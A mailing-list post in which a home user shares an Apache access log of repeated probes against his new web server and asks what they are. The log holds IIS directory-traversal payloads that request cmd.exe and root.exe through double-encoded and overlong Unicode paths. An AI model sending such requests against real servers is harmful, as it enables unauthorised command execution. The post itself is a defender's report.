[plug] Anyone seen this particular attack pattern before?

[Alan Graham]

I've just set up a web server on my firewall, to show some photo's of the
kids to my folks in England.  Within a few days, I started seeing this
attack.  It comes in regularly, from a lot of different IP's, and it's
obviously aimed at NT IIS.  Ha.  I'm thinking it's a well known scripted
attack, or posibly a zombied attack?  There's a pause of about 5 minutes
between each attack.  The pisser is that most of the hosts appear to be
within iinet.  I suppose I'd better let them know too.

Can anyone tell me any more about it?

Extract of access_log
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-"
"-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 321 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 321 "-" "-"
"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-"
"-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
"-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-"
"-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
"-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-"
"-"

Regards

Alan Graham